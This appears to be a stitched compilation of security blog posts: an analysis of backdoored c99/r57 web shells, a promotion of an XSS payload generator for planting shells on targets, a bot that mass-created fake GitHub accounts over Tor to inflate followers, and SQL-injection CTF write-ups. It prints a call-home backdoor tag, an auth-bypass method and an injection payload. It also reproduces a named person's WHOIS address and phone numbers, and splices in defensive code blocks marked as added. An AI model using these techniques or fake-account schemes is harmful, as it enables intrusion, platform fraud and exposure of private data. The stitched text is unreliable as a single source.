TL;DR all shells from http://www.r57.gen.tr/ are backdoored, shockingly. But in a pretty clever way you probably didn’t expect.

You know sometimes when I find things in security that are probably unethical, I’m more impressed than morally distressed.

I decided to poke around some of the online sources for the typical shells (c99, r57, etc) and after a quick search:

I’ve got all the shells I’d ever need!

Or do I? Let’s check out this first site shall we?

C99 is probably the more famous one, so let’s take a look at it!

mandatory@mandatorys-box:~/Pentest/c99$ grep --color -n "https://" c99.php 

79:if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}

1706:   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}


mandatory@mandatorys-box:~/Pentest/c99$ grep --color -n "http://" c99.php 
11:   http://ccteam.ru/releases/c99shell

13:*  WEB: http://ccteam.ru

79:if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}

99:$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";

103:$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/"; //Update server

259:if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}

599:# Home page: http://ccteam.ru

855:?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; 
border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software: <?php echo $DISP_SERVER_SOFTWARE; ?></b> </p><p align="left"><b>uname -a: <?php echo wordwrap(php_uname(),90,"<br>",1); ?></b> </p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b> </p><p align="left"><b>Safe-mode: <?php echo $hsafemode; ?></b></p><p align="left"><?php
1706:   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}

2912:if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";}

2926:<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>powered by</b></u></a> Captain Crunch Security Team | <a href="http://r57.gen.tr"><font color="#FF0000">r57 shell</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>

mandatory@mandatorys-box:~/Pentest/c99$ 

Now immediately everyone’s first thought is to check the PHP itself for clever backdoors. After all, this is a backdoor shell so why wouldn’t it be a backdoored backdoor shell (bleh).

But notice this section:

<SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>

Hmm, what’s the source for that page?

Ho-ho-ho that’s a little suspicious, so it’s making an image with the source being http://www.r57.gen.tr/yaz/yaz.php?a= plus our current URL?

Naughty naughty, navigating to this URL we find:

Oh a blank page, that’s probably nothing at all!

Or…just maybe…they are capturing IP addresses to alert the website owners or steal the shells for themselves (far more likely).

I’m willing to bet there is a PHP auth-bypass in the code as well…

Auth Bypass Exploit

Notice this piece of code here:

Found this after diffing this c99 shell against other online copies. For those not familiar, extract() is a VERY dangerous function to use. Basically you pass it an array and it turns each key into a variable holding that key’s value.

This example from the official PHP site says it all:

<?php

/* Suppose that $var_array is an array returned from
   wddx_deserialize */

$size = "large";
$var_array = array("color" => "blue",
                   "size"  => "medium",
                   "shape" => "sphere");
extract($var_array, EXTR_PREFIX_SAME, "wddx");

echo "$color, $size, $shape, $wddx_size\n";

?>

Guess what is right after that line?

So one could very easily overwrite $login, $md5_pass, etc to override the login.

EDIT: This same JS link is in all of the shells on the site. See r57.php:

$head = '<!-- ??????????  ???? -->
<html>
<head>
<SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

The moral of this lesson is obvious but I’m more entertained by the fact that they went with a JS backdoor. Who would check the Javascript for backdoors? It’s the perfect crime!
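A way to check third-party PHP for both problems described above, the call-home script tag and extract() fed from request data, as an added example that is not from the original post. The `audit_php` helper, the trusted-host list and the sample are assumptions; the `extract($_REQUEST)` line is constructed to stand in for code the post showed only in a screenshot.

```python
import re
from urllib.parse import urlparse

# Tags that make the viewer's browser fetch a URL as soon as the page renders.
# Handles unquoted, quoted and PHP-escaped (\") attribute values.
FETCH_TAG = re.compile(
    r"""<\s*(script|img|iframe|link)\b[^>]*?\b(?:src|href)\s*=\s*\\?["']?"""
    r"""((?:https?:)?//[^\s"'>\\]+)""",
    re.IGNORECASE,
)
# extract() fed directly from request data lets the client choose variable names.
EXTRACT_CALL = re.compile(
    r"\bextract\s*\(\s*(\$_(?:GET|POST|REQUEST|COOKIE))\b([^;]*)", re.IGNORECASE
)
# Flags under which extract() does not replace variables that already exist.
NON_OVERWRITING = ("EXTR_SKIP", "EXTR_PREFIX_SAME", "EXTR_PREFIX_ALL")


def audit_php(source, trusted_hosts=()):
    """Return (line, finding, detail) tuples for one PHP file's text."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in FETCH_TAG.finditer(line):
            host = (urlparse(m.group(2)).hostname or "").lower()
            if host not in trusted_hosts:
                findings.append((lineno, "remote-" + m.group(1).lower(), host))
        for m in EXTRACT_CALL.finditer(line):
            guarded = any(flag in m.group(2) for flag in NON_OVERWRITING)
            kind = "extract-guarded" if guarded else "extract-overwrite"
            findings.append((lineno, kind, m.group(1)))
    return findings


# Constructed sample; only the SCRIPT tag is copied from the post.
SAMPLE = r'''<?php
extract($_REQUEST);                  // constructed stand-in for the screenshot
$login = "admin"; $md5_pass = "";
extract($_POST, EXTR_SKIP);
?><html><head><script src="/js/local.js"></script>
<SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>
<img src=\"//cdn.example.test/logo.png\">
'''

if __name__ == "__main__":
    for finding in audit_php(SAMPLE, trusted_hosts=("cdn.example.test",)):
        print(finding)
```

A "guarded" extract() is still worth reading by hand, since variables that are not yet defined at that point can be injected regardless of the flag.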

The domain is apparently Turkish and has been registered for some time, so I can’t imagine the number of bad shells that have been distributed.

** Registrant:
   İsmail Kalayli
   Gulbahar Mah. Gayret Sk. No:21 K:1
   Mecidiyekoy
   İstanbul,
     Türkiye
   Email Masking [email protected]
   + 90-212-3564407
   + 


** Registrar:
NIC Handle	 : cth16-metu
Organization Name	: Çizgi Telekomünikasyon Hizmetleri San. ve Tic.Ltd.Şti.
Address	 : Esentepe Mah. Elif Sk. No:4 K:1
  Mecidiyeköy / Şişli
  İstanbul,34390
  Türkiye
Phone	 : + 90-212-2131213-
Fax	 : + 90-212-3564407


** Domain Servers:
ns1.teenficken.com
ns2.teenficken.com

** Additional Info:
Created on..............: 2008-Oct-22.
Expires on..............: 2015-Oct-21.

But let’s be honest, somebody has to have noticed this right…?

Or maybe nobody actually falls for this…?

*facepalm*

Which isn’t even the source but copied from http://www.computersecuritystudent.com/SECURITY_TOOLS/MUTILLIDAE/MUTILLIDAE_2511/lesson11/

For archiving reasons I’ll keep the source here to show the *current* backdoor in case it’s changed: http://pastebin.com/LCDrr0e8

EDIT: I now have a moral dilemma because I’m sure people will abuse this exploit to break into more sites…Hmm…

After working with more and more complex Javascript payloads for XSS I realized that most of the work I was doing was unnecessary!

I scraped together some snippets from my Metafidv2 project and created “xssless”, an automated XSS payload generator. This tool is sure to save some time on more complex sites that make use of tons of CSRF tokens and other annoying tricks.

Psst! If you already understand all of this stuff and don’t want to read this post click here for the github link.

The XSS Vulnerability

Once you have your initial XSS vulnerability found you’re basically there! Now you can do evil things like session hijacking and much more!

But wait, what if the site is extra secure and locks you out if you use the same session token from a different IP address? Does this mean your newly found XSS is useless?

Of course not!

XSS Worms & JavaScript Payloads

Remember, if you can execute JavaScript in the user’s browser you can do anything the user’s browser can do. This means as long as you’re obeying same-domain, you’re good to go!

How?

JavaScript payloads of course!

Not only are JavaScript payloads real, they are quite dangerous – people often write up XSS as being a ‘low priority’ issue in security. This is simply not true; I have to imagine this comes from a lack of amazement at the casual JavaScript popup alerts with session cookies as the message. Lest we forget how powerful the Samy Worm was, propagating to over a million accounts and running MySpace’s servers into the ground. This was one of the first big displays of just how powerful XSS could be.

Building Complex Payloads

Building payloads can be a real pain, custom coding every POST/GET request and parsing CSRF tokens all while debugging to ensure it works.

After building a rather complex payload I realized this is pointless, why couldn’t a script do the same?

xssless

Work smart not hard, using xssless you can automatically generate payloads for any site quickly and efficiently.

xssless generates payloads from Burp proxy exported requests, meaning you do your web actions in the browser through Burp and then export them into xssless.

An Example Scenario

Imagine if we had an XSS in a site we wanted to compromise. You want to get a shell on this server but only employees/administrators can actually upload files. This server is also very secure and will lock you out if you change IP addresses so you can’t just steal the user’s token.

To start, we fire up Burp and set Firefox to use it as a proxy. Now we simply perform this web action in our test environment offline and upload a random file.

Select them in Burp and export them…

After selection, Right Click > Save items

And save them somewhere so we can access them.

Great, now we fire up xssless and generate our payload!

mandatorys-box% cat example_csrf_token_list.txt 
CSRFToken
__VIEWSTATE
csrf
__RequestVerificationToken
authenticity_token
csrftoken

mandatorys-box% cat example_file_list.txt 
file,/home/mandatory/Programming/C/hello_world

mandatorys-box% ./xssless.py -s -f=example_file_list.txt -p=example_csrf_token_list.txt file_upload

The Output


Now, a few things have happened here.

-xssless has replaced the uploaded file with the shell specified in example_file_list.txt.

-The CSRF token named “csrftoken” has been automatically parsed due to the -p option specifying example_csrf_token_list.txt.

You now have a fully working payload that you can deploy against your target. Wasn’t that easy?

I’ll be adding more features as time goes on so please comment on any features you’d like to see!


Click Here for the Github Page

After a discussion with a friend of mine I’ve decided to do a blog post about a program I created called “Githug”, and how I used it to get to the front of Github.com.

Some background is necessary: I am very into designing web bots to do all sorts of crazy stuff. I often end up building bots just for the hell of it or just because I think something will be funny (to me at least!). I’d also like to state I don’t dislike Github in any way; rather, I think they’re all pretty cool guys!

The Idea

The initial idea came to me while I was chilling in one of my college courses sitting next to my friend who is a solid programmer (something I sadly am not). He had an upcoming interview at a tech company that he was excited about and he mentioned that they would be checking his Github page to see code samples. I jokingly said that I should get him thousands of fake followers to “beef up” his page and make him look like a huge developer. We made some more jokes about what I’d call the bot and decided “Githug” would be a clever name. After joking I probed around Github’s registration system and found out that it didn’t seem like it’d be too complicated to do! I think the rest is a bit…self explanatory.

 

The Script (Githug)

My free-time is always what gets me in trouble :P

Excuse me for the stupid anime references, this whole thing was just a joke from the beginning.

The script was a pretty straightforward one, all it would do is utilize fake usernames from FakeNameGenerator in conjunction with a disposable email address service, all over Tor.

That’s quite a mouthful, but all it means is I put some effort into making it look not completely fake (to Github’s systems, in case they would limit my account creations). After every account was created it would then follow my friend’s Github and log out immediately afterwards. The script would then change its exit node “identity” and repeat this process all over again – all while recording the created accounts for later use and noting any errors along the way.

For those who care, the script was created via my Metafid code generation tool which is PHP/cURL based. Yes, I do realize the irony of linking to my Github repo here :)

Initial repo – a bit more cocky than I intended :)

 

The Results

I won’t mention what happened to my friend’s Github but let’s say it worked out very well for him (clever readers will probably find it regardless). I will however, post pictures of my Github when I ran this tool continuously for ~20 hours.

It begins! This was after a half hour I believe

 

Trending top for the current day

 

Trending for this week too!

 

Woot! Trending top for this month!

 

Looking completely legit on the frontpage :)

 

Gave me a chuckle

 

Received a few emails of this nature, had to disappoint them!

 

Recently, I have been doing quite a bit of CTF write-ups for my blog and I’ve seen I continually need to exploit SQLi edge cases. In the “Robots Exclusion Committee Writeup” I had to do SQL injection via basic HTTP authentication which is in all likelihood not found in any tool.  In “CSAW 2013 WidgetCorp Writeup” I had to do SQL injection via a serialized, base64 encoded, cookie. Again, not available on any SQL injection tool.

With a simple script however, you can exploit just about any SQLi edge cases without doing anything manually.

Like I need an excuse for a diagram!

 

All you need to do to exploit these SQLi edge cases is have a custom script hosted locally that encodes the payload and mirrors the remote server’s responses. It’s important to mirror things such as HTTP status codes and other headers because many tools rely on these in order to work. If you don’t replicate them properly you may just confuse your SQL injection tool to no end and get bad results.

In this way you could very easily exploit even the most edge of cases, this doesn’t have to be a manual thing either. You can also just simply manually inject the URL of your local script just like you would on any other remote site.

See here:

Testing the script with a bad password

HTTP basic auth

 

While the SQL injection appears simple here, I’m actually doing SQLi via HTTP basic auth

Here is some example code from that problem:

I should have mirrored the headers as well but this was good enough

This is of course not an efficient or stealthy way to go about things, but it’s still a quicker way to exploit things of this type. Perhaps not suitable on a real pen-test, but it would be very helpful for quick CTF-like environments. That being said, if your edge case is weird enough I doubt most IDS systems would pick up what you’re doing.

Like I said previously in my CSAW post, it’s like being a hybrid script kiddy. Little bit of scripting & a little bit of tool usage and baby you got a stew goin’

On a final note, this would apply to edge cases of other attack types as well. Perhaps you were doing a local file inclusion via some oddly encoded cookies – this technique would work there in largely the same manner.

Until next time,

-mandatory

The challenge:

This is very punny, as you will see later

The link takes you to this page:

Entering in real credit card info should lose you points in CTFs

Entering in real credit card info is clearly the solution ;)

Looks very legit, after you fill in some filler junk into the form you get this page:

Oh! You mean that wasn’t it? Hey that’s not very polite either! Apparently robots aren’t the only ones without hearts.

Here is the source for the main page, nothing too interesting here…

Not much to see here

Not much to see (except for the warning about the money stealing thing!)

I tried checking the CSS to see if it referenced any elements not seen in the two pages we have so far. Suffice to say they don’t but they did have this comment for us:

Taunting in CTF is always fun (or frustrating when you just can’t get it!)

So, let’s think like a robot – where would we check?

Oh right, robots.txt maybe?

 

Those fools! It’s the first place an evil robot would check! This site is clearly ill prepared for any sort of robo-attack

So from this we can glean that WallE is not welcome here and that we _shouldn’t_ check out the /vault page…

Not sure what I expected

 

Now, let’s have an honest talk. I was stuck here for quite a while, when I think of HTTP basic authentication I usually think .htaccess/.htpasswd files and nothing more. All static files and not much to go on except bruteforcing. It took me a while to think about fuzzing this input right here (idiotically so, perhaps).

This is not the case, however. This is actually completely dynamic and not only that but it’s SQL injectable – by setting my password to " OR 1=1-- I was able to null authenticate and get to the vault page.

Like I said, took me far longer than it should’ve to realize that.
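Why that password works, and the fix, as an added example that is not the challenge's code: the decoded Basic credentials are client-controlled strings, and a query assembled by string formatting parses the quote as SQL. The table layout, the account and the function names are assumptions, and SQLite stands in for whatever database the challenge used.

```python
import base64
import hmac
import sqlite3

# Password value quoted in the write-up (straight quote, double hyphen).
PAGE_PAYLOAD = '" OR 1=1--'


def make_db():
    """Constructed stand-in for the challenge's user table."""
    db = sqlite3.connect(":memory:")
    if hasattr(sqlite3, "SQLITE_DBCONFIG_DQS_DML"):
        # Accept "double-quoted" string literals, which the weak query uses.
        db.setconfig(sqlite3.SQLITE_DBCONFIG_DQS_DML, True)
    # Plaintext column only to keep the focus on query construction.
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("alice", "constructed-pw"))
    return db


def basic_header(user, password):
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def parse_basic(header):
    """Return (user, password) from an Authorization header value, or None."""
    scheme, _, blob = header.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    user, sep, password = decoded.partition(":")
    return (user, password) if sep else None


def login_vulnerable(db, header):
    creds = parse_basic(header)
    if creds is None:
        return False
    # The decoded values are pasted into the SQL text, so a quote in the
    # password closes the string literal and the rest is parsed as SQL.
    sql = 'SELECT 1 FROM users WHERE name = "%s" AND password = "%s"' % creds
    return db.execute(sql).fetchone() is not None


def login_hardened(db, header):
    creds = parse_basic(header)
    if creds is None:
        return False
    user, password = creds
    # The placeholder keeps the value as data; the SQL text never changes.
    row = db.execute("SELECT password FROM users WHERE name = ?", (user,)).fetchone()
    return row is not None and hmac.compare_digest(row[0].encode(), password.encode())
```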

A secret! But remember we don’t want secret #2 – we want secret #1!

 

Before I continue, it’s obviously time for a relevant XKCD on this topic:

suspicion

Yes, they really have done everything haven’t they?

Moving forward, we know that the HTTP basic authentication script they are running is SQL injectable. Let’s roll with that – we are going to be taking a page from one of my previous posts titled “CSAW 2013 WidgetCorp Writeup, with bonus coolness”. TL;DR we will set up a “proxy” page to do the heavy lifting of encoding the SQL injection payload and set it up as a local server. Once we’ve done this we can point any SQL injection tool at it and voilà!

Testing the script with a bad password

Attempting our SQL injection like before but through our proxy page – all looks good!

Great, now that all seems to be functioning correctly we’ll point sqlmap at our local page and crack away!

That’s not it!

 

Ooh! Looks like what we’re after :)

Once the injecting has completed we get a dump of their database. This yields two base64 encoded PNG files (secret #1 and secret #2!)

Sweet, sweet victory!

When you decode this base64 you get the following image:

eat_all_robots

I suggest you re-read the challenge text for a full understanding of the puns missed initially 😛

Overall a very cool challenge, learned a very important lesson about assuming things. I’ll try to remember that for future CTFs!

Until next time,

-mandatory